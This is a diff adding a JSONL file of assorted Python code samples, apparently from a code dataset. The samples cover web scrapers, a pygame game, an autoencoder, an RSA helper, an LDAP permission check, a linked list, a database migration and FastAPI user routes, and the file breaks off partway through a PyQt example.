diff --git "a/6244.jsonl" "b/6244.jsonl" new file mode 100644--- /dev/null +++ "b/6244.jsonl" @@ -0,0 +1,661 @@ +{"seq_id":"219957056","text":"from bs4 import BeautifulSoup\nimport ctypes\nimport urllib.request\nimport urllib\n\nimport sys\n\nfrom collections import Counter\nimport random\nimport webbrowser\nfrom konlpy.tag import Hannanum\nfrom lxml import html\nimport pytagcloud\nimport sys\n\n\nif sys.version_info[0] >= 3:\n urlopen = urllib.request.urlopen\nelse:\n urlopen = urllib.urlopen\n\nr = lambda: random.randint(0,255)\ncolor = lambda: (r(),r(),r())\n\n\ndef get_tag(text, ntags=50, multiplier=10):\n h = Hannanum()\n nouns = h.nouns(text)\n count = Counter(nouns)\n return [{ 'color' : color(), 'tag' : n, 'size': c*multiplier} for n,c in count.most_common(ntags)]\n\n\ndef draw_cloud(tags, filename, fontname='Noto Sans CJK', size=(800,600)):\n pytagcloud.create_tag_image(tags, filename, fontname=fontname, size=size)\n webbrowser.open(filename)\n\nindex = 0\nmy_list = []\ns = \"\"\ninit_number = 63844\nwhile True:\n\tif index == 20:\n\t\tbreak\n\tno = init_number+index\n\tpage_url = 'http://www.thisisgame.com/webzine/game/nboard/16/?n='+str(no)\n\turl_open = urllib.request.urlopen(page_url)\n\tsoup = BeautifulSoup(url_open, 'html.parser', from_encoding = 'utf-8')\n\tp_list = soup.select('.content-line span')\n\n\tfor i in range(0, len(p_list)):\n \t\tmy_list.append(p_list[i].text)\n\tindex = index+1\nfor i in range(0, len(my_list)):\n s += my_list[i]\ntags = get_tag(s)\nprint(tags)\ndraw_cloud(tags, 'thisisgame.png') \n","sub_path":"crawling/thisisgmae.py","file_name":"thisisgmae.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"140541967","text":"import random\n\nimport pygame\n\nfrom menu.Item import Item\nfrom menu.Menu import Menu\nfrom playobjects.Block import Block\nfrom playobjects.Player import Player\n\nwindow = pygame.display.set_mode((800, 400))\npygame.display.set_caption(\"RUN!\")\nicon = pygame.image.load(\"img/block.png\")\npygame.display.set_icon(icon)\n\nscreen = pygame.Surface((800, 400))\n\nx = 0\ny = 0\nsquare_go_right = True\nsquare_go_down = True\n\nw, h = pygame.display.get_surface().get_size()\n\nmenu = Menu(w, h, [])\nmenu.menu(window)\n\nplayer = Player(0, 360)\nblock = Block(800, 360)\npygame.font.init()\nfont = pygame.font.Font(\"fonts/Mono.ttf\", 32)\n\ndone = True\npygame.key.set_repeat(1, 1)\ntime_delay = pygame.time.Clock()\ndt = 0\n\nwhile done:\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = False\n if e.type == pygame.KEYDOWN:\n if e.key == pygame.K_SPACE:\n player.jump()\n screen.fill((255, 255, 255))\n\n # render\n player.render(screen)\n f = font.render(\"points %d\" % player.points, 1, (0, 0, 0))\n screen.blit(f, (0, 0))\n if block is not None:\n block.render(screen)\n window.blit(screen, (0, 0))\n\n # Relation logic\n if block.visible:\n if player.check_collision(block):\n menu = Menu(w, h, [Item(\"Points = %d\" % player.points, w, h / 2)])\n menu.menu(window)\n block = Block(800, 360)\n player = Player(0, 360)\n if block.x < player.x and player.y + player.h > block.y:\n player.y = min(360, block.y)\n\n player.move(dt)\n\n # Block logic\n\n if block.visible:\n block.move()\n if block.x < -50:\n block.y = 400\n block.visible = False\n block.real_speed = 0\n player.points += 1\n if player.points % 5 == 0:\n block.increase_speed()\n\n if not block.visible:\n if random.randint(0, 1000) > 990:\n block.reset()\n\n 
pygame.display.flip()\n dt = time_delay.tick(200)\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"631054728","text":"import cv2\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport os\nfrom tqdm import tqdm\nfrom initializers import *\nfrom auto_encoder import Autoencoder\nimport pandas as pd\n\nrandom.seed(1447)\nnp.random.seed(1447)\n\n\ndef random_input(path, size=256):\n image_paths = [os.path.join(path, img_path) for img_path in os.listdir(path)]\n # img_path = image_paths[0] # beee :)\n img_path = random.choice(image_paths)\n print(\"Loading image: {}\".format(img_path))\n img = cv2.imread(img_path, 0)\n img = cv2.resize(img, (size, size))\n img = 2 * img / 255 - 1\n img = limit_values(img)\n return img.copy()\n\n\ndef loss_sqe(x, y):\n return (x - y) ** 2\n\n\nDATA_TRAIN_DIR = './data/train/'\nDATA_TRAIN_DIR = './data/test/'\nDATA_TEST_DIR = './data/test/'\nRESULTS_DIR = './results/'\n\nMOMENTUM = 0.95\nTRAIN_ITERS = 1000\n\n# 1e-4 for bee lr\n\n\ndef train(min_error=1000., max_iter_count=1000, data_dir=DATA_TRAIN_DIR, learn_rate=0.0001, print_w=False,\n use_norm=True, loss=loss_sqe, mid_layers=64, use_adapt_lr=True):\n global TRAIN_ITERS\n model = Autoencoder(use_norm=use_norm, initializer=glorot_uniform, loss=loss, mid_layers=mid_layers, lr=learn_rate,\n use_adapt_lr=use_adapt_lr)\n train_sample = random_input(data_dir)\n errors = []\n best_errors = []\n moving_average = None\n best_error = np.inf\n best_weights = None\n is_good = False\n try:\n for _ in tqdm(range(max_iter_count)):\n if is_good:\n continue\n error = model(train_sample)\n moving_average = MOMENTUM * moving_average + error * (1. 
- MOMENTUM) if moving_average else error\n errors.append(moving_average)\n if best_errors:\n best_errors.append([_, min(moving_average, best_errors[-1][1])])\n else:\n best_errors.append([_, moving_average])\n if moving_average < best_error:\n print(moving_average)\n best_error = moving_average\n best_weights = model.get_weights()\n\n if best_error < min_error and not is_good:\n TRAIN_ITERS = _\n is_good = True\n except RuntimeError as e:\n print(e)\n finally:\n print(\"Number of iteration to get e={}: {}\".format(min_error, TRAIN_ITERS))\n x = np.arange(len(errors))\n plt.plot(x, np.array(errors))\n idx = np.argmin(errors)\n print(\"BEST ERROR {}\".format(errors[idx]))\n plt.plot(x[idx], errors[idx], 'rx--', linewidth=2, markersize=12)\n plt.xlabel('Iteration')\n plt.ylabel('Current Error')\n plt.savefig('error_{}.png'.format(mid_layers))\n plt.show()\n model.set_phase('test')\n model.set_weights(best_weights)\n if print_w:\n print(best_weights)\n print(best_errors)\n s_e = sorted(best_errors, key=lambda x: x[1])\n x = [_[1] for _ in s_e]\n y = [_[0] for _ in s_e]\n plt.plot(x, y, 'ro--', linewidth=0.5, markersize=3)\n plt.xlabel('Error')\n plt.ylabel('Min Iterations')\n plt.savefig('error_deps.png')\n plt.show()\n print(s_e)\n\n return model\n\n\nif __name__ == \"__main__\":\n\n model = train(mid_layers=64, learn_rate=0.0001, min_error=1000.0)\n flower_path = os.path.join(DATA_TEST_DIR, '1.jpg')\n img, res = model.predict(flower_path)\n fig, ax = plt.subplots(1, 2)\n ax[0].imshow(img, cmap='gray')\n ax[0].set_xlabel('original')\n ax[1].imshow(res, cmap='gray')\n ax[1].set_xlabel('modified')\n plt.savefig('32.png')\n plt.show()\n","sub_path":"IAI/autoencoder/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"259021157","text":"#!/usr/bin/env python3\n\nimport rsa\n'''\n refer to https://github.com/zhanghe06/python/blob/master/tools/rsa_encrypt.py\n'''\nclass MRsa(object):\n def __init__(self,pubfile,prifile):\n self.pubf=pubfile\n self.prif=prifile\n\n def CreateKeys(self):\n (_pub,_pri)=rsa.newkeys(1024)\n\n pub=_pub.save_pkcs1()\n with open(self.pubf,'w+') as pub_file:\n pub_file.write(pub)\n\n pri=_pri.save_pkcs1()\n with open(self.prif,'w+') as pri_file:\n pri_file.write(pri)\n\n def GetPri(self):\n with open(self.prif) as pri_file:\n p=pri_file.read()\n pri_key=rsa.PrivateKey.load_pkcs1(p)\n return pri_key\n\n def GetPub(self):\n with open(self.pubf) as pub_file:\n p=pub_file.read()\n pub_key=rsa.PublicKey.load_pkcs1(p)\n return pub_key\n\n def Encrypt(self,plaintext):\n pub_key=self.GetPub()\n ciphertext=rsa.encrypt(plaintext,pub_key)\n return ciphertext\n\n def Decrypt(self,ciphertext):\n pri_key=self.GetPri()\n plaintext=rsa.decrypt(ciphertext,pri_key)\n return plaintext\n\n def Signature(self,message):\n pri_key=self.GetPri()\n sign=rsa.sign(message,pri_key,'SHA-256')\n return sign\n\n def VerifySign(self,plaintext,ciphertext):\n pub_key=self.GetPub()\n try:\n rsa.verify(plaintext,ciphertext,pub_key)\n return True\n except:\n return False\n\n\n\nif __name__=='__main__':\n m=MRsa('./pub.pem','./pri.pem')\n# m.CreateKeys()\n print(m.Decrypt(m.Encrypt('helloworld')))\n\n","sub_path":"python/rsahandler.py","file_name":"rsahandler.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"79618480","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a AsusJobs spider 
created on top of the ATSSpider\n scrapy crawl asusjobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://hr-recruit.asus.com/\"\n\n sample job url:\n https://hr-recruit.asus.com/showPositionDesc.aspx?fb=1837\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix\n\n\nclass AsusJobs(ATSSpider):\n\n name = \"asusjobs\"\n Job_Url = compile(r\"\\('(\\S+)','.*\\)\")\n\n def parse(self, response):\n sel = Selector(response)\n redirect_url = sel.xpath('//frame/@src').extract()\n if redirect_url:\n yield Request(\n callback=self.parse_redirect_page,\n url=urljoin(response.url, redirect_url[0])\n )\n\n def parse_redirect_page(self, response):\n sel = Selector(response)\n event_target = sel.xpath('//select[@name=\"dropSelZLD00\"]/@id').extract()\n categories = sel.xpath('//select[@name=\"dropSelZLD00\"]/option/@value').extract()\n for category in categories:\n yield FormRequest.from_response(\n callback=self.parse_job_list,\n formname='form1',\n formdata={\n '__EVENTTARGET': ''.join(event_target),\n 'dropSelZLD00': category,\n },\n response=response\n )\n\n def parse_job_list(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//table[@id=\"itemTable\"]//tr/td/label/@onclick').extract()\n for job in jobs:\n url = self.Job_Url.search(job)\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n url=urljoin(response.url, '/%s' % url.group(1))\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n\n loader.add_xpath(\n 'description',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]' % unicode('職位說明', 'utf-8')\n )\n loader.add_xpath(\n 'jobcategory',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('需求部門/單位', 'utf-8')\n )\n loader.add_xpath(\n 'location',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('工作地點', 'utf-8')\n )\n loader.add_xpath(\n 'referencenumber',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('職位代號', 'utf-8'),\n Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'title',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('職位名稱', 'utf-8')\n )\n loader.add_xpath(\n 'other',\n '//td[contains(text(), \"%s\")]/../following-sibling::tr[@class=\"cart_oii\"][1]/td/text()' % unicode('其他工作條件', 'utf-8')\n )\n\n loader.add_value('apply_url', response.url)\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/asusjobs.py","file_name":"asusjobs.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"106179007","text":"import cv2\nimport numpy as np\n\ndef nothing(x):\n pass\n\nimage_x, image_y = 64,64\n\nfrom keras.models import load_model\nclassifier = load_model('Trained_model.h5')\n\ndef predictor():\n import numpy as np\n from keras.preprocessing import image\n test_image = image.load_img('1.png', target_size=(64, 64))\n test_image = image.img_to_array(test_image)\n test_image = np.expand_dims(test_image, axis = 0)\n result = classifier.predict(test_image)\n \n 
if result[0][0] == 1:\n return 'Book'\n elif result[0][1] == 1:\n return 'Clock'\n elif result[0][2] == 1:\n return 'Fork'\n elif result[0][3] == 1:\n return 'Friend'\n elif result[0][4] == 1:\n return 'Lamp'\n elif result[0][5] == 1:\n return 'Marriage'\n elif result[0][6] == 1:\n return 'Shoes'\n elif result[0][7] == 1:\n return 'Stop'\n elif result[0][8] == 1:\n return 'Toilet'\n elif result[0][9] == 1:\n return 'with'\n\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"Trackbars\")\n\ncv2.createTrackbar(\"L - H\", \"Trackbars\", 0, 179, nothing)\ncv2.createTrackbar(\"L - S\", \"Trackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"L - V\", \"Trackbars\", 0, 255, nothing)\ncv2.createTrackbar(\"U - H\", \"Trackbars\", 179, 179, nothing)\ncv2.createTrackbar(\"U - S\", \"Trackbars\", 255, 255, nothing)\ncv2.createTrackbar(\"U - V\", \"Trackbars\", 255, 255, nothing)\n\ncv2.namedWindow(\"test\")\n\nimg_counter = 0\n\nimg_text = ''\nwhile True:\n ret, frame = cam.read()\n frame = cv2.flip(frame,1)\n l_h = cv2.getTrackbarPos(\"L - H\", \"Trackbars\")\n l_s = cv2.getTrackbarPos(\"L - S\", \"Trackbars\")\n l_v = cv2.getTrackbarPos(\"L - V\", \"Trackbars\")\n u_h = cv2.getTrackbarPos(\"U - H\", \"Trackbars\")\n u_s = cv2.getTrackbarPos(\"U - S\", \"Trackbars\")\n u_v = cv2.getTrackbarPos(\"U - V\", \"Trackbars\")\n\n\n img = cv2.rectangle(frame, (425,100),(625,300), (0,255,0), thickness=2, lineType=8, shift=0)\n\n lower_blue = np.array([l_h, l_s, l_v])\n upper_blue = np.array([u_h, u_s, u_v])\n imcrop = img[102:298, 427:623]\n hsv = cv2.cvtColor(imcrop, cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv, lower_blue, upper_blue)\n \n cv2.putText(frame, img_text, (30, 400), cv2.FONT_HERSHEY_TRIPLEX, 1.5, (0, 255, 0))\n cv2.imshow(\"test\", frame)\n cv2.imshow(\"mask\", mask)\n \n #if cv2.waitKey(1) == ord('c'):\n \n img_name = \"1.png\"\n save_img = cv2.resize(mask, (image_x, image_y))\n cv2.imwrite(img_name, save_img)\n print(\"{} written!\".format(img_name))\n img_text = predictor()\n \n\n if cv2.waitKey(1) == 27:\n break\n\n\ncam.release()\ncv2.destroyAllWindows()","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"478780663","text":"import sys\nsys.path.append('../')\n\nimport argparse\nimport mediascrapers\nfrom mediascrapers import TwitterImageScraper\n\nif __name__ == \"__main__\":\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--url-list\", required=True,\n help=\"Path of file\")\n args = vars(ap.parse_args())\n filepath = args[\"url_list\"]\n\n scraper = TwitterImageScraper(driver='chrome', mode='verbose', debug=True)\n file = open(filepath, 'r')\n URLs = file.readlines()\n\n for url in URLs:\n print(url)\n tasks = scraper.scrape(url)\n scraper.download(tasks=tasks, path='.\\\\download\\\\general')\n","sub_path":"mediascraper/twitterimagescraper.py","file_name":"twitterimagescraper.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24999974","text":"import ldap\n\nfrom functools import wraps\n\nfrom flask import redirect, url_for, abort, request, current_app\n\n\ndef check_ldap(remote_user):\n try:\n l = ldap.initialize(current_app.config[\"LDAPS_URL\"])\n l.set_option(ldap.OPT_X_TLS, 1)\n l.bind_s(\n current_app.config[\"LDAP_DN\"],\n current_app.config[\"LDAP_PW\"])\n admin = l.search_s(\n current_app.config[\"LDAP_ADMIN_FQDN\"],\n 
ldap.SCOPE_SUBTREE,\n            \"(userPrincipalName={})\".format(remote_user),\n            [\"memberOf\"])\n        if admin and \"memberOf\" in admin[0][1]:\n            results = admin[0][1][\"memberOf\"]\n            return results\n\n        staff = l.search_s(\n            current_app.config[\"LDAP_STAFF_FQDN\"],\n            ldap.SCOPE_SUBTREE,\n            \"(userPrincipalName={})\".format(remote_user),\n            [\"memberOf\"])\n        if staff and \"memberOf\" in staff[0][1]:\n            results = staff[0][1][\"memberOf\"]\n            return results\n    except:\n        return []\n    return []\n\n\ndef permissions(needed, return_to=False):\n    def check_permissions(function):\n        @wraps(function)\n        def wrapper(*args, **kwargs):\n            my_perms = check_ldap(request.environ[\"REMOTE_USER\"])\n            if set(needed).intersection(set(my_perms)):\n                return function(*args, **kwargs)\n            if current_app.config[\"LDAP_ADMIN_FQDN\"] in my_perms:\n                return function(*args, **kwargs)\n            if return_to:\n                return redirect(url_for(return_to))\n            return abort(401)\n        return wrapper\n    return check_permissions\n","sub_path":"app/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"196380527","text":"from math import log\nfrom math import pow\nfrom math import sqrt\n\nimport sys\n\ndef nsqrt(x, n):\n\treturn x**(1/float(n))\n\n\ndef d(a0, e):\n\tcnt = 0\n\teroot = nsqrt(a0, e)\n\twhile eroot == int(eroot):\n\t\tcnt+=1\n\t\teroot = nsqrt(eroot, e)\n\treturn cnt\n\n\ndef subd(a0, e, N):\n\tk = d(a0, e)\n\tcandidat = int(nsqrt(a0, e))\n\twhile pow(a0, e)+candidat > N and k >= 0:\n\t\tcandidat = int(nsqrt(candidat, e))\n\t\tk -= 1\n\t\n\treturn k\n\ndef main(argv):\n\tN = int(argv[0])\n\tresultat = 0\n\temax = int(log(N)/log(2))\n\tprint (\"emax = \", emax)\n\tfor e in range(2, emax+1):\n\t\ta0 = 2\n\t\twhile pow(a0, e)+a0 <= N:\n\t\t\tk = d(a0, e)+1\n\t\t\tresultat += k*k\n\t\t\ta0+=1\n\t\tif d(a0, e) > 0: # Border case where the condition a0^e+a0 <= N might not hold anymore.\n\t\t\tprint (a0, e)\n\t\t\tl = subd(a0, e, N) # If a0 = x^(e*k), we find the highest l s.t.
a0^e+x^(e*l) <= N.\n\t\t\tif l >= 0:\n\t\t\t\tresultat += (l+1)**2\n\n\tprint (resultat)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv[1:])\n","sub_path":"src/pb617.py","file_name":"pb617.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"620301227","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 11 15:02:09 2018\r\n\r\n@author: Balasubramaniam\r\n\"\"\"\r\n\r\nfrom openpyxl import load_workbook\r\nfilePath=\"F:/citi_ml_jun2018/day1/GDP.xlsx\"\r\nwb=load_workbook(filePath,read_only=True,data_only=True)\r\nsheetRef=wb.get_sheet_by_name(\"GDP\")\r\nfor row in range(6,70):\r\n print(sheetRef.cell(column=1,row=row).value,end=\"\\t\")\r\n\r\n","sub_path":"ExcelFileReading.py","file_name":"ExcelFileReading.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"286539549","text":"class Node:\r\n def __init__(self, val):\r\n self.data = val\r\n self.next = None\r\n self.previous = None\r\n\r\n\r\nclass DLinkedList:\r\n \"\"\"\r\n DLinkedList class contains the main methods of a doubly linked list\r\n \"\"\"\r\n def __init__(self):\r\n self.head = None\r\n self.tail = None\r\n self.size = 0\r\n\r\n def get_head(self):\r\n \"\"\"\r\n get the value of the first node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n return None\r\n return self.head.data\r\n\r\n def get_tail(self):\r\n \"\"\"\r\n get the value of the last node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.tail is None:\r\n return None\r\n return self.tail.data\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def prepend(self, val):\r\n \"\"\"\r\n add a leading node at the beginning of the linked list giving its value\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n newNode = Node(val)\r\n newNode.next = self.head\r\n newNode.previous = None\r\n if self.tail is None:\r\n self.tail = newNode\r\n if self.head:\r\n self.head.previous = newNode\r\n self.head = newNode\r\n self.size += 1\r\n\r\n def pop_first(self):\r\n \"\"\"\r\n delete the leading node of the linked list\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n raise IndexError\r\n else:\r\n del_val = self.head.data\r\n self.head = self.head.next\r\n if self.head:\r\n self.head.previous = None\r\n self.size -= 1\r\n if self.size == 0:\r\n self.tail = None\r\n return del_val\r\n\r\n def append(self, val):\r\n \"\"\"\r\n add a node at the end of the linked list giving its value\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n new_node = Node(val)\r\n if self.head is None:\r\n self.tail = new_node\r\n self.head = new_node\r\n else:\r\n old_tail = self.tail\r\n self.tail.next = new_node\r\n self.tail = new_node\r\n self.tail.previous = old_tail\r\n self.size += 1\r\n\r\n def pop_last(self):\r\n \"\"\"\r\n delete the last node of the linked list\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n if self.head is None:\r\n raise IndexError\r\n last_node = self.tail.data\r\n self.tail = self.tail.previous\r\n if self.tail:\r\n self.tail.next = None\r\n self.size -= 1\r\n if self.size == 0:\r\n self.head = None\r\n return last_node\r\n\r\n def insert_node(self, new_node, previous_node):\r\n \"\"\"\r\n insert a giving node to the new list given the previous node to it\r\n \"\"\"\r\n 
# Time complexity: O(1)\r\n # Space complexity: O(1)\r\n next_node = previous_node.next \r\n new_node.next = next_node\r\n new_node.previous = previous_node\r\n if next_node:\r\n next_node.previous = new_node\r\n else:\r\n self.tail = new_node\r\n previous_node.next = new_node\r\n\r\n # return a list of all values of the nodes\r\n n = self.head\r\n out = [n.data]\r\n for _ in range(self.size):\r\n n = n.next\r\n out.append(n.data)\r\n return out\r\n\r\n def detete_node(self, node):\r\n \"\"\"\r\n delete a given node\r\n \"\"\"\r\n # Time complexity: O(1)\r\n # Space complexity: O(1)\r\n prev_node = node.previous # get the node before the node to delete\r\n next_node = node.next # get the node after the node to delete\r\n if (not prev_node) and (not next_node): # if there are nodes before and after the node (linked list size is 1)\r\n self.head = None # set the head to None\r\n self.tail = None # set the tail to None\r\n if prev_node: # if previous node found\r\n prev_node.next = next_node # set its next reference to the next node\r\n else:\r\n self.head = next_node # if not found, set head of the linked list to the next node\r\n if next_node:\r\n next_node.previous = prev_node\r\n else:\r\n self.tail = prev_node\r\n\r\n\r\n\r\n","sub_path":"implementation_5/doubly_linked_list.py","file_name":"doubly_linked_list.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"365355437","text":"\"\"\"Add fields to Team\n\nRevision ID: d2853477b461\nRevises: a23d4d63432d\nCreate Date: 2017-01-04 17:23:20.326509\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'd2853477b461'\ndown_revision = 'a23d4d63432d'\nbranch_labels = None\ndepends_on = None\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('teams', sa.Column('created_at', sa.DateTime(timezone=True), nullable=True))\n op.add_column('teams', sa.Column('description', sa.String(), nullable=True))\n op.add_column('teams', sa.Column('owner_id', sa.Integer(), nullable=True))\n op.add_column('teams', sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True))\n op.create_foreign_key(None, 'teams', 'users', ['owner_id'], ['id'])\n op.add_column('users_teams', sa.Column('created_at', sa.DateTime(timezone=True), nullable=True))\n op.add_column('users_teams', sa.Column('id', sa.Integer(), nullable=False))\n op.add_column('users_teams', sa.Column('team_ud', sa.Integer(), nullable=True))\n op.add_column('users_teams', sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True))\n op.drop_constraint('users_teams_team_id_fkey', 'users_teams', type_='foreignkey')\n op.create_foreign_key(None, 'users_teams', 'teams', ['team_ud'], ['id'])\n op.drop_column('users_teams', 'team_id')\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('users_teams', sa.Column('team_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'users_teams', type_='foreignkey')\n op.create_foreign_key('users_teams_team_id_fkey', 'users_teams', 'teams', ['team_id'], ['id'])\n op.drop_column('users_teams', 'updated_at')\n op.drop_column('users_teams', 'team_ud')\n op.drop_column('users_teams', 'id')\n op.drop_column('users_teams', 'created_at')\n op.drop_constraint(None, 'teams', type_='foreignkey')\n op.drop_column('teams', 'updated_at')\n op.drop_column('teams', 'owner_id')\n op.drop_column('teams', 'description')\n op.drop_column('teams', 'created_at')\n ### end Alembic commands ###\n","sub_path":"alembic/versions/d2853477b461_add_fields_to_team.py","file_name":"d2853477b461_add_fields_to_team.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99022","text":"from bs4 import BeautifulSoup\n\n\ndef read_file(fileName):\n file = open(fileName)\n data = file.read()\n file.close()\n return data\n\n\nsoup = BeautifulSoup(read_file('intro_to_soup_html.html'), 'lxml')\nmeta = soup.meta\nprint(meta)\nprint(meta.get('charset'))\n\nbody = soup.body\nprint(body)","sub_path":"example 5.py","file_name":"example 5.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"288455100","text":"\"\"\"\nEndpoint routers for users.\n\nEventually might need to handle auth here as well, so write code as if\nthat was an upcoming feature.\n\"\"\"\nfrom fastapi import APIRouter\nfrom models import users as models\nfrom docs import users as docs\nimport util.users as utils\n\nrouter = APIRouter()\n\n\n@router.post(\n \"/users/register\",\n response_model=models.UserRegistrationResponse,\n description=docs.registration_desc,\n summary=docs.registration_summ,\n tags=[\"Users\"],\n status_code=201,\n)\nasync def register_user(form: models.UserRegistrationForm):\n # send the form data and DB instance to util.users.register_user\n user_id = await utils.register_user(form)\n\n # return response in reponse model\n return models.UserRegistrationResponse(user_id=user_id)\n\n\n@router.delete(\n \"/users/delete\",\n description=docs.delete_user_desc,\n summary=docs.delete_user_summ,\n tags=[\"Users\"],\n status_code=204,\n)\nasync def delete_user(identifier: models.UserIdentifier):\n await utils.delete_user(identifier)\n\n\n@router.post(\"/users/find\",\n response_model=models.UserInfoQueryResponse,\n description=docs.find_user_by_identifier_desc,\n summary=docs.find_user_by_identifier_summ,\n tags=[\"Users\"],\n status_code=200)\nasync def get_user(identifier: models.UserIdentifier):\n user_data = await utils.get_user_info_by_identifier(identifier)\n return models.UserInfoQueryResponse(**user_data.dict())\n","sub_path":"routes/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"613148416","text":"#!/usr/bin/env python\n\nfrom optparse import OptionParser\nfrom gen.run_generators import RUNGeneratorRes\nimport os\nimport sys\n\ndef parse_args():\n parser = OptionParser(\"usage: %prog [options] [files...] \"\n \"[generators...] 
[param=val[,val]...]\")\n\n parser.add_option('-o', '--out-dir', dest='out_dir',\n help='directory for data output',\n default=(\"%s/%s\"% (os.getcwd(), \"RESEXPS\")))\n\n return parser.parse_args()\n\ndef main():\n opts, inFolders = parse_args()\n distr = 0.8\n res_number = 3\n \n if not os.path.exists(opts.out_dir):\n os.mkdir(opts.out_dir)\n if opts.out_dir[-1] != '/':\n opts.out_dir = opts.out_dir+'/'\n \n for folder in inFolders:\n done = False\n trial = 0\n while (not done and trial < 50):\n try:\n if folder[-1] == '/':\n folder = folder[:-1]\n foldername = folder.strip().split('/')[-1]\n out_dir = opts.out_dir+foldername+\"_res=\"+str(distr)+\"/\"\n if not os.path.exists(out_dir):\n os.mkdir(out_dir)\n \n \n generator = RUNGeneratorRes()\n generator.out_dir=out_dir\n\n params = {}\n\n ts = generator._create_taskset_from_file(params, res_number, folder, distr)\n\n generator._customize(ts, params)\n generator._write_schedule(dict(params.items() + [('task_set', ts)]))\n generator._write_params(params)\n done = True\n except:\n trial += 1\n continue\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"duplicateExpWithRes.py","file_name":"duplicateExpWithRes.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313627800","text":"# https://stackoverflow.com/questions/62262538/how-to-add-an-image-in-pyqt-qdock-widget\n\nfrom PyQt5 import QtWidgets, QtGui\nfrom PyQt5.QtWidgets import (QApplication, QMainWindow)\nfrom PyQt5.QtCore import Qt\n \nimport sys\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.resize(800, 600)\n\n dockWidget = 